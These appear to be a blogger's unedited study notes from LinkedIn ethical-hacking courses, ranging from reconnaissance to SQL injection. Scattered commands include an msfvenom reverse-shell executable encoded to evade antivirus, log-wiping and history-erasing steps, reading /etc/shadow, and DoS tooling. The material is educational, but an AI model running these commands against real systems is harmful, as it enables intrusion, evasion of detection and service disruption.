Ethical Hacking : Notes

Ethical Hacking Notes


  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserve the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

Reference :


Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock Chapter 6: Ethical Hacking: System Hacking, By: Lisa Bock Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock Chapter 9: Ethical Hacking: Social Engineering By: Lisa Bock Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore


Technology: Security

Become an Ethical Hacker

Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.

Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock

** attacks types

1. Passive

- Sniffing

- Port scanning

2. Active

- Release malware

- Launch DDoS

** Standards:





- COBIT framework

** Burst Attack or DoS

Reconnaissance - gather information about you.

3 Basics for a Org to contain cyber attack

1. Technical controls - Detect & Protect

2. Administrative

3. People


NAT - N/w address translation

Spam filters, packet shapers & honey-spots

TOGAF - The Open Group Architecture Framework

ITIL - Information Technology Infrastructure Library

COBIT - Control Objectives for Information and Related Technology

SOX - Sarbanes-Oxley (SOX) act

SOX - section 301 & 404 = Indirectly deal with Information assurance and Data integrity

Penetration testing : can include N/w devices, email, hosts, wireless, applications, and websites.

FISMA - Federal Information Security Management Act

Vulnerability Scanning Tool

1. Tenable

Ethical Hacking

Means -

- what is derived from the information

- what can be planned to devise counter measures

Planned Five Phases approach

- Reconnaissance

- Scanning

- Gaining access

- Maintaining access

- Covering Tracks


Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock

Finding Information everywhere:-

Public resources - Websites, directories, email, job sites, Social websites.

Google Hacking database:

HTTrack Website Copier

Montastic is free for open source software


Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.

Shodan is the world's first search engine for Internet-connected devices.

Email Header look up

 Metagoofil is an information gathering tool designed for extracting metadata of public documents

FOCA (Fingerprinting Organizations with Collected Archives)

theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.

DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.

The Anti Hacker Alliance™ fights against Hackers



Network Tools: The Trusted Free Online

dig Command in Linux

ip logger : can track geo location using ip logger URL


Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock

Ports 1 - 1023

21 FTP

22 SSH

53 Domain Name system


88 Kerberos

Ports from 1024-49151 are registered

3389 - Remote desktop Protocol (RDP)

Vulnerability Scan

Firewall response in port scanning:

open means listening

Closed means denying

No reply means in stealth mode

Tools in Kali Linux:

Netcat and Nmap




Banner Grabbing: is done to get

operating system

Open ports and service running

To Prevent Banner Grabbing:

Mask or disable the web server

Hide file extensions on services

Disable unnecessary service

SSDP: Simple Service Discovery Protocol

NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.

FING App :

Net Scan by Nick Circelli

IP Tools: WiFi Analyzer by AmazingByte

Nikto :

Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.

Staying anonymous:

1. Use private browsing

2. privacy badger

3. use password manager

4. use duckduck go

5. use VPN

6. temp email

Stay anonymous in Mobile

1. Don't use phone

2. don't use google

3. disable gps

4. use waze

Onion Routing TOR

1. Don't torrent

2. don't install or enable plugins

3. use only https

4. don't open documents

TOR flow network

Proxy Chain: Tools

1. Proxy swicher

2. Proxifier

3. Proxy workbench

Kali Linux:

sudo apt-get install tor

sudo apt-get install proxychains

SSH tunnels:


Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore

Enumeration is Identifying -

1. Username

2. System addresses

3. Network resources


5. Other targets

Before Vulnerable testing

- Extract usernames

- Gather host information via null sessions

- port enumeration

- user account enumeration

- special protocol enumeration


- Local host enumeration

- remote host enumeration

- internet enumeration

- port and services enumeration

Useful service

Port 53 - DNS Domain Name System

Port 25 - SMTP Simple Mail transfer Protocol

Port 135 - RPC Remote Procedure calls

Port 139 - NetBIOS

Port 161 - SNMP simple network management Protocol

Port 389 - LDAP Lightweight Directory Protocol

Port 445 - SMB Server message Block


└─$ echo $UID


└─$ cat /etc/passwd |more


└─$ sudo cat /etc/sudoers


└─$ getent group sudo

How to run in root mode from User mode 


└─$ sudo su              


└─# echo $UID



└─# Exit 




  • NetBIOS name service - port 137 UDP

  • Datagram Distribution service - PORT 138 UDP

  • NetBIOS over TCP/IP - PORT 139 TCP


  • SAMBA is a linux implementation of SMB

DCE Distributed Computing Environment

  • RPC Remote Procedure Call

Local-Host Enumeration: 

Profiling a Linux Metasploitable 2 

$ cat /proc/version 

$ cat /etc/*-release

$ cat /proc/cpuinfo

$ df -a

$ df -h

$ cat /etc/shells

List of user names

  • $ cat /etc/passwd

Password with Hash 

  • $ sudo cat /etc/shadow

$ pinky

$ w

$ who -a

Profiling a windows Host

Download PsTools:-

Windows Terminal

Downloads> cd .\PSTools\

Downloads\PSTools> .\PsInfo.exe

Downloads\PSTools> .\PsInfo.exe -d

Downloads\PSTools> .\PsInfo.exe -s

Downloads\PSTools> .\pslist.exe

Downloads\PSTools> .\pslist.exe -t

Downloads\PSTools> .\pslist.exe -x

Downloads\PSTools> .\psloglist.exe -n 10

Downloads\PSTools> .\PsLoggedon.exe

Downloads\PSTools> .\PsService.exe

Downloads\PSTools> .\PsService.exe security Eventsystem

Downloads\PSTools> .\PsService.exe depend Eventsystem

Kali Linux :- 

Getting details from metasploitable-2 

smbmap -u '' -p '' -H -R

sudo netstat -i 

Get UDP open ports only

nmap -sU 

Get TCP open ports only 

nmap -PS

SMB from Linux:-



└─$ nbtscan -h


└─$ sudo nbtscan -v -s : 

─$ sudo nbtscan -rv



└─$ ls /usr/share/nmap/scripts 


└─$ sudo nmap --script smb-os-discovery


└─$ sudo nmap --script smb-enum-users



└─$ enum4linux -U


└─$ enum4linux -S




└─$ rpcclient -h


Understanding how to enumerate WMI is useful both for offensive and defensive activities.



└─$ whatweb


└─$ whatweb --no-errors | grep -v Unassigned



└─$ nikto -h   


sudo apt install zaproxy


Tracing Routes 


└─$ sudo traceroute -I  

Enumeration Cloud 

AWS has its own CLI (command line input) 

NetScanTools Basic Edition




└─$ telnet


Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock

Managing Org Risk: 

Risk = Threats * Vulnerabilities 

Zero-Day Attack

Vulnerabilities found in wild -> Unaware = Public + Vendor 

Then after the period Vendor is aware -> Unaware = Public

Vendor  released patches -> aware = Public

Assessing Vulnerabilities

  • Network scanning

  • 2 types 

    • Information systems = DBMS, software

    • Information technologies = Hardware, n/w devices

  • How run Vul. scan 

    • Unauthenticated scan = No user/pass, basic config, can miss many vuln. 

    • Authenticated scan = clone environment system, valid user/pass, detailed scan

Lifecycle for Vuln management

  • Baseline

  • Assess Vuln = Plan (compliance req.; Tools- Ports cans, n/w scans, web app scans.)

  • Assess Risk

  • Remediate = Mitigate the vuln. 

  • Verify = retest 

  • Monitor = continuous monitoring 

Threat Modeling 

Used to create VM of the entire system along with potential points and a list of possible attacks 

Data Breach :

Web-based User Feedback System

Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat. 

Analyzing Vulnerabilities 

NIST SP 800-30, Page 78

NIST: Common Vulnerability Scoring System Calculator [CVSS]

CVE: Common Vulnerabilities and Exposures

Each CVE has id and score is derived from metrics CVSS

Current CVSS Score Distribution For All Vulnerabilities

Learn Vulnerability scan from Web

Virtual Machine Image :

Kali linux

Commando VM:

Github link:-

Nikto : Built into Kali linux


└─$ nslookup


└─$ nikto -h  

Fuzz Testing 

A black box method that floods a system with inputs

Kali linux - OWASP ZAP


Defending the LAN


Man In The Middle Attack

ARP spoofing 

MAC spoofing 

Cisco Discovery Protocol Attack

VLAN hopping attack

DHCP attack

Yersinia attack Tool:


└─$ sudo yersinia -G

Attacks can be launched from yersinia. 

Monitoring Tools:

Firewalls and HIDS

Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall

Intrusion detection:

Intrusion must learn the system, can monitor the host for suspicious activities 

Examples- Symantec endpoint protection, McAfee host intrusion Prevention, Suricata.

Hack a website Exercise:-


Chapter 6: Ethical Hacking: System Hacking,  By: Lisa Bock

APT Advanced persistent Threat

NTLM New Technology LAN Manager


PAM Pluggable Authentication Modules

SASL Simple Authentication and Security Layer

Gaining Access:- 

SAM Security Account Manager 

Random Password Manager:-

Dictionary Attack

Brute Force Attack

Hybrid Attack

Password cracking Tools:

 L0phtCrack 7.2.0 has been released as an open source project

Ophcrack is a free Windows password cracker based on rainbow tables.

John the Ripper

Cain and Abel

Secure Hash Algorithms used for hashing the passwords

Rainbow crack:-

Create  the Hash format for password

Online Reverse Hash Lookup

Escalating Privileges

  • Horizontal

  • Vertical  

Privilege escalation takes advantage of vulnerability and tries to gain administrator access.


Password Resetting Tool:

simda bot free ip scanner

Recognizing Spyware

Categories of Malware

  • Spyware

  • Viruses

  • Worms

  • Trojans

  • Rootkits

  • Adware

Block Third party cookies always

Anti Spyware Tools: 

Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.


Help Your Kids by Watching Their Back


 non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference


Hiding in Plain Sight

Creating Hidden content 

desktop> notepad temp.txt:secret.txt

To display hidden content:- 

desktop>more < temp.txt:secret.txt

Steganography Tools: these are obsolete 

  • MP3Stego

  • S-Tools

  • OpenPuff

Update : Local Security Policy in windows

Local policies -> Audit Policy-> audit account logon events -> enable

Covering Tracks:
  • For Linx: Metasploit meterpreter > clearev

  • Open log files stored in /var/log directory

    • In BackTrack: kwrite /var/log/messages

  • Erase command history 

    • Export HISTSIZE=0

  • Open Event Logger and select clear log 


Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore

Introduction to Malware

Improve the windows startup service: Regedit: - Then delete unwanted register key - Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs


Zeus malware:

Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.

  • Citadel (malware)

Virus Construction Kit

2 types 

  • GUI interface

  • Configuration file

SpyEye Builder 


Trojan Development Kit - TDK

Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit


is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.

Malware Detection

IOC Indicator of Compromise

IOA Indicator of Attack

IOC Bucket 

is a free community driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way. 

IOC Bucket


ADS Anomaly Detection System 

Sandboxing Malware

Some enterprise products as examples

Malware That changes

  • Polymorphic

  • Metamorphic

  • Delivery via Phishing, via port 445 - configured for file sharing

APT Defenses: advanced persistent threat 

Targeted cyberattacks logbook

Click on the each marware and get more information 

SODIN malware:

Exploits using CVE-2019-2725/9

Dropper installs w32.sodin malware

Privilege escalation using CVE-2018-8453 & gains full system privileges

BlackEnergy 2 & 3: Malware - attacks industrial control workstations 

Encrypted Rootkill payload 

GreyEnergy Malware

Reverse Engineering Malware is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code


A source for packet capture (pcap) files and malware samples

Automated Malware analysis
Hybrid Analysis 

This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. 

BlackEnergy /2 /3 - Malware - attacks industrial control workstations 

Encrypted Rootkill payload 

Help file in Russian

It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.

BlackEnergy 2

  • Kernel mode driver

  • Process injection

  • Privilege escalation based on ms08-025

BlackEnergy 3

  • 2015 Ukraine power grid attacks

  • Then gave into GreyEnergy Malware

Analyzing Packers

UPX is a free, portable, extendable, high-performance executable packer for several executable formats.

Ghidra : tools developed by NSA's

A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission


Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock

Sniffing  or Packet Analysis


  • Wireshark


  • Comes from nmap for windows along with wireshark.


  • Gather

  • Decode

  • Display

  • Analyze

    • Is the traffic normal

      • TCP flags

      • Malware Signatures

      • Traffic in clear text

      • Router advertisements 

OSI Model


OSI model in wireshark 

Active Attacks:

  • Denial of Service DoS

  • Buffer overflow

  • Password attack

Tapping in to Data Stream

  • 2 basic types of ethernet environments

    • Shared or hub based

    • Switched network


  • 802.11b/g/n act like a hub

IPv4 Vs IPv6

MAC Attacks 



└─$ sudo macof

Vulnerable protocols

  • STP = Spanning Tree Protocol 

    • Attacks

      • DoS using BPDU Flood

  • CDP = Cisco Discovery Protocol

    • Attacks

      • Send bogus CDP to other devices

      • Flood CDP & cause a DoS

  • DTP

  • DHCP

  • HRSP

  • ISL

  • VTP

  • 802.1Q

  • 802.1X

Macof Attack Defense

  • Use switch port security

Macof Spoofing Defense

  • Used in Man-in-the-middle attack

  • Use Filtering trusted IP & MAC address


DHCP process

  • Discover

  • Offer

  • Request

  • Acknowledge

VLAN Access Control List VACL

  • Access control on the switch not the router



  • Tool in Kali Linux

  • Used in man in the middle attack


└─$ ettercap -G

Old websites


To prevent DNS attacks

  • Enable Cache locking

Sniffing Tool and TEchniques 


Linux Tools

  • Tcpdump

  • Ettercap

  • Dsniff

Windows - WhoFi


Chapter 9: Ethical Hacking: Social Engineering  By: Lisa Bock

Social Engineering Techniques 

  • Phone phishing

  • Online recon

  • Dumpster diving

  • Shoulder surfing

  • Simple persuasion


  • Poses as love interest

  • Lures you into a relationship 


  • Privacy most important 

  • TOR browser

Extensions or Addons 

  • Auto update enabled 

Reputation Risk

  • Use of social platform 

Information Collection 

  • Identification Theft

  • Report fake account in facebook

Penetration testing with social Engineering

  • Phishing emails

  • Dangerous websites 

  • Fake Call 

Pentesting with SET - Social Engineering Toolkit

  • Download the toolkit or use with kali linux

  • SET - Crafts the bait

  • Metasploit - creates the exploit

The Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) - TrustedSec


Desktop File shredder File Shredder


Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore

Understanding DoS


  • Digital Attack Map

Attack Types:

  • DoS

  • DDoS

Network Based attacks

  • TCP SYN flood 

  • Smurf (ICMP) flood

  • UDP flood

  • ARP flood

  • DNS reflection 

Wireless Attacks

  • De-authentication

  • Routing congestion

Application Attacks

  • HTTP services

  • FTP service

  • SIP services

Infrastructure of DoS

Hping3 -h


└─$ hping3 -h 

HPing3 Cheatsheet ≈ Packet Storm

Hyenae download |

 Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. 

LOIC Approach



└─$ ettercap -P list

Ettercap -TQP dos_attack

Ettercap -G


└─$ service --status-all | more


Denial of service using NTP servers to amplify attacks

It appears someone is using an attack vector like this to DDOS CloudFlare

GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers


Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.


This tool allows you to send forged UDP packets to Memcached servers obtained from

GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API

Wireless DoS



└─$ sudo airmon-ng

Application DoS


GoldenEye is a HTTP DoS Test Tool. This tool can be used to test if a site is susceptible to Deny of Service (DoS) attacks. Is possible to open several parallel connections against a URL to check if the web server can be compromised.



Cryptolocker Ransomware

  • Distributed by botnets

  • Drops randomly generated name

  • Inserts startup command into registry

Post Encryption 

  • Ransom Message displayed

  • Countdown timer started

  • If payment not received, files are deleted 

Paying Ransom

  • Payment of the ransom is made using bitcoins. 

  • Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards. 

  • Once the victim pays the ransom, a transaction ID is provided. 

  • The victim can then enter this into the Cryptolocker program that is running.

  •  The private key is then sent to the victim, and the decryption process begins.

Mitigation Techniques

Mitigation by design

  • Priority based servicing 

    • Priority Management

    • Discard low priority

    • Aggregate based congestion control [ACC]

  • Egress filtering

    • Packet inspection

    • Detect bad packets

  • Ingress filtering 

    • Malicious packet detection

    • NEtwork context 

Operation Mitigation 

  • IP address verification

    • Source address spoofing

    • Real Time detection

    •  Real time traceback 

  • Rate limiting

  • ACLs

  • Detecting known malicious threats

    • Characterizing normal

    • Metrics to reflect normal boundaries 

  • Detecting traffic anomalies


 is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.

Project Shield

Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline



Resilient Interdomain Traffic Exchange:

BGP Security and DDoS Mitigation

Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation

  • 39 control plane and BGP security recommendations

  • 26 DDoS mitigation recommendations

    • 12 recommendations for source address validations

    • 7 recommendations for port Filtering 

    •  1 recommendations on rate limiting

    • 6 recommendations on flow specification blackholing

IOT Distributed IDS


Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore

Into Session Hijacking 

  • Stateless HTTP

  • Session IDs

  • PHP session array


Establishing Man in the Middle

  • Web proxy

  • ARP poisoning

  • Malicious Wifi

Cookie hijacking 


Subterfuge-Framework /Framework for Man-In-The-Middle attacks

ARP poisoning

Cain and Abel



Hijack Putty sessions in order to sniff conversation and inject Linux commands.

DNS Hijacking

Cloud hijacking 

API Key HIjack

Hijacking the Physical Worlds

Vehicle wiring Diagram

Parrot Drone

  • UDP 5554- telemetry data

  • TCP 5555- streaming video

  • UDP 5556- flight commands

  • UDP 5559- critical data

Acrylic Wi-Fi Home – WiFi Scanner

Enhanced Kamkar attack

  • Telnet connection

  • Add firewall rule

  • Laptop application to control drone

Photography Drone

  • 2.4GHz radio control link

  • XBee telemetry link

  • 5.8GHz streaming video link

Telemetry Channel attacks 

  • Detect all ZigBee station

  • Delete the mac address and set attackers mac address

  • Pair victim with attacker


Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore


Windows Firewall

  • Windows Defender Firewall Properties 

    • Public Profile

      • Inbound connections = Block all connections

      • Settings-> Customize -> allow unicast response = No {to safe from defense performance mark as NO} 

      • Logging->Customize->

        • Log Dropped packets = Yes

        • Log Successful connections = yes

Windows DNS Log Analyser

Linux Firewall



└─$ sudo iptables -L -n -v


└─$ cat /var/log/kern.log

Networking using GN3 

GNS3 :

All in one:-

  • Tour of GN3

  • Basic operation

  • Routed network

  • ASA secure enclave


  • Target to lure attackers 

    • Identify and prosecute

    • Monitor and analyze

  • Types of honey pots

    • Low interaction 

    • High interaction

    • Honeynets

  • sinkhole

This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.

Protection from Intrusion

  • Blacklist the websites

  • Whitlist

    • Just add the sites to be allowed

    • This is easier than maintaining the blacklist 


  • Log and Alert output 

    • alert_fast

    • alert_full

    • Default file /var/logs/snort/

    • alert_syslog


Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.

Security Onion

Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.

Evasion Techniques



└─$ msfvenom --list encoders  

Msfvenom -p windows/meterpreter/reverse_tcp  --platform windows -a x86 LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe

Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed

Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.


Chapter 13:  Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore

Introduction to WEB Servers 

Return Code from web servers

  • 200 - processed OK

  • 400 - bad request

  • 403 - unauthorized

  • 404 - not found

  • 500 - internal server error 


Google QUIC

burpsuite | Kali Linux Tools

Testing vulnerable website

OWASP WebGoat - Learn the hack - Stop the attack




└─$ whatweb [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]


└─$ whatweb -l | more   

Web Security Dojo

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo


Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore

Wi-Fi Networks

Speed Standards

Wireless security

  • Network key

  • Internet login

  • MAC filtering

  • Encryption- WEP, WPA, and WPA2

  • Connection -WPS

Signal aspects of wireless

  • Performance in dBi is against a benchmark 

  •  Gain is expressed in units of dBi, decibels isotropic, and the higher the decibels, the more powerful the antenna, and the more reliable the communication is. Sometimes performance will be expressed as dBm, which is pure signal power. dBm are related to milliwatts through the equation dBm equals 10 times log to the 10 milliwatts. 

  •  When transmitting, a positive number represents better performance, or gain, from the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated to be a good transmitter.

  •  For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about minus 90 dBm. 

Yagi antenna or fishbone antenna

Parabolic antenna

wifite | Kali Linux Tools

reaver | Kali Linux Tools

  • Reaver 

  • Wash



Wifi Pineapple:

WiFi Pineapple - Hak5


fern-wifi-cracker | Kali Linux Tools

MetaGeek | inSSIDer - Defeat Slow Wi-Fi

fern-wifi-cracker | Kali Linux Tools


  • Serial Port Profile SPP

  • Human interface Device Profile HID

  • Hands-Free Profile HFP

  • Advanced Audio Distribution Profile A2DP

  • Audio/Video Remote control Profile AVRCP


└─$ lsusb


└─$ sudo bluelog -l


└─$ btscanner 


└─$ fang -h


Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore

Mobile technology

  • OWASP Mobile Security methodologies 

  • Effective testing

    • Static analysis

      • App source code

      • Reverse Engg.

      • Clone runtime environment

      • Identify

        • All N/w interfaces

        • N/W protocols 

        • Complements interactions

        • Data access

        • App interfaces

      • Encryption

      • Pinning

        • Certificate

        • Public key

    • Dynamic analysis

      • Changes to device storage

      • Info transmitted

      • Web app testing

    • Forensic analysis

    • Virtualization

OWASP Mobile Security Testing Guide

OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.


  • Builds on the Linux security model 

  • “*.dex” extensions are Dalvik executable files.

Download Android Studio & App Tools

Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.

Apk Files

dex2jar download |

dex2jar | Kali Linux Tools

GitHub - skylot/jadx: Dex to Java decompiler

OWASP Security Shepherd

The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.


Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari

Internet of Things 

IoT Attacks 

  • Lack of security

  • Vulnerable interfaces

  • Lack of firmware updates

OWASP Internet of Things

Type of attacks

  • DDoS

  • Rolling code attack

  • BlueBorne attack

  • Jamming attacks

  • Backdoor

  • Sybil

  • Side channel 

Hacking Methodology

  • Information gathering

  • Vulnerability scanning

  • Launch attack

  • Gain access

  • Maintain access 


Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas


  • Symmetric Cryptography 

  • Asymmetric

  • Hashing 


  • Plaintext 

  • Block

  • Stream

DES - Data Encryption standard 

  • Replaced by AES

ADES - Advanced Encryption Standard 

RC - Rivest Cipher

  • Symmetric

  • Designed by Ron Rivest

  • RC4

  • RC5

  • RC6

ECC - Elliptical Curve Cryptography


Hybrid Cipher

  • Symmetric & Asymmetric combined together 


  • One way function

  • Used in passwords

MD5 - Message Digest

  • 128-bit o/p

SHA - Secure hashing Algorithm

  • 160-bit o/p

Digital Certificates

  • Authorized Agency Verification 

  • CA - Certificate authority verification

  • Digital Certificate X.509

    • Version

    • Serial no

    • Algorithm ID

    • Issuer

    • Validity

DSA - Digital Signature Algorithm 

PKI - Public Key Infrastructure

  • Certificate management system

  • Digital certificate 

  • CRL - certification revocation list

  • CA - certificate authority  

  • RA registration authority 

  • Enduser 

New  Secure Protocols

  • S/MIME - Secure MIME - added digital signature, public key encryption to emails

  • PGP - Pretty good privacy - similar to PKI

  • SSH - secure shell - encrypted channels for remote command for a system.

Real world exploits


  • Electronic Frontier Foundation EFF

    • Electronic Frontier Foundation


  • HEARTbleed 


  • Poodlebleed "Padding Oracle On Downgraded Legacy Encryption"

  • DROWN - Decrypting RSA with Obsolete and Weakened eNcryption


  • FREAK ("Factoring RSA Export Keys")


Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance

Cloud Overview

  • XaaS

  • SaaS

  • PaaS

  • IaaS

Cloud identity Management 

  • MFA Multi Factor Authentication 

  • RBAC Role-Based Access Control

Cloud High Availability

  • Business Continuity and Risk Management

    • Identify assets

    • Identify assets threats

    • Identify threat likelihood

  • Data Replication 

  • Application Resiliency 

GDPR General Data Protection Regulation 

PCI DSS - Payment Card Industry Data Security 


Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

Testing SQL Injection

OWASP Security Shepherd



└─$ service mysql start  


└─$ sudo mysql -u root -p 

MariaDB [(none)]> show databases;

MariaDB [(none)]> use information_schema;

MariaDB [information_schema]> show tables;

MariaDB [information_schema]> use mysql

MariaDB [mysql]> show database; 

MariaDB [mysql]> show tables;

MariaDB [mysql]> show columns from user;

MariaDB [mysql]> select user,password from user;



Popular Posts

Chennai :MTC complaint cell Customer Care No.:+91-9445030516 /Toll Free : 18005991500


Marriage Registration Online steps [Tamil Nadu]